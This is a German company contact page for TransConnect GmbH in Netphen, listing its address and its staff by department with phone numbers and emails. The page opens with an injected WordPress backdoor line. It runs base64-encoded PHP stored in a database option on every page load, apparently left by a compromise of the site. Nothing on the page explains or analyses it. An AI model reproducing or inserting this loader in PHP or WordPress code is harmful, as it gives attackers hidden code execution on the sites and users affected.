add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); RKI – Wir bewegen Stahl » TransConnect Netphen

TransConnect Netphen

TransConnect GmbH

Waldstr. 67
57250 Netphen

Anfahrt

Bitte nutzen Sie den folgenden Link, um sich Ihre Anfahrt bequem per Routenplaner anzeigen zu lassen.

Zum Routenplaner

Kontaktinfo

Sie haben Fragen zu unserem Leistungsportfolio? Oder wünschen eine unverbindliche Beratung? Dann rufen Sie uns an. Oder füllen Sie das
Kontaktformular aus. Wir melden uns innerhalb von 48 Stunden bei Ihnen. Versprochen.

Telefon 0203 - 5443 - 0
Telefax 0203 - 5443 - 251

Geschäftsführung

Rainer Klein

Telefon: +49 (2737) 508-406

Telefax: +49 (2737) 508-403

E-Mail: klein@trans-connect.de

Abrechnung & Service

Lena Gräbener

Telefon: +49 (2737) 508-176

Telefax: +49 (2737) 508-403

E-Mail: graebener@trans-connect.de

Disposition

Felix Behle

Telefon: +49 (2737) 508-411

Telefax: +49 (2737) 508-488

E-Mail: behle@trans-connect.de

Disposition

Victor Herb

Telefon: +49 (2737) 508-402

Telefax: +49 (2737) 508-488

E-Mail: herb@trans-connect.de

Disposition

Michelle Sander

Telefon: +49 (2737) 508-400

Telefax: +49 (2737) 508-488

E-Mail: sander@trans-connect.de

Disposition

Faith Yildirim

Telefon: +49 (2737) 508-401

Telefax: +49 (2737) 508-488

E-Mail: yildirim@trans-connect.de

Versandabwicklung

Melanie Klein

Telefon: +49 (2737) 508-237

Telefax: +49 (2737) 508-117

E-Mail: mklein@trans-connect.de

Versandabwicklung

Lisa Korstian

Telefon: +49 (2737) 508-177

Telefax: +49 (2737) 508-117

E-Mail: korstian@trans-connect.de

Versandabwicklung

Thomas Strassmair

Telefon: +49 (2737) 508-245

Telefax: +49 (2737) 508-117

E-Mail: strassmair@trans-connect.de

Abfertigung

Carsten Münker

Telefon: +49 (2737) 508-484/-373

Telefax: +49 (2737) 508-117

E-Mail: muenker@trans-connect.de

Abfertigung

Sarah Potyka

Telefon: +49 (2737) 508-484/-373

Telefax: +49 (2737) 508-117

E-Mail: potyka@trans-connect.de

Abfertigung

Stefanie Surber-Willer

Telefon: +49 (2737) 508-484/-373

Telefax: +49 (2737) 508-117

E-Mail: surber@trans-connect.de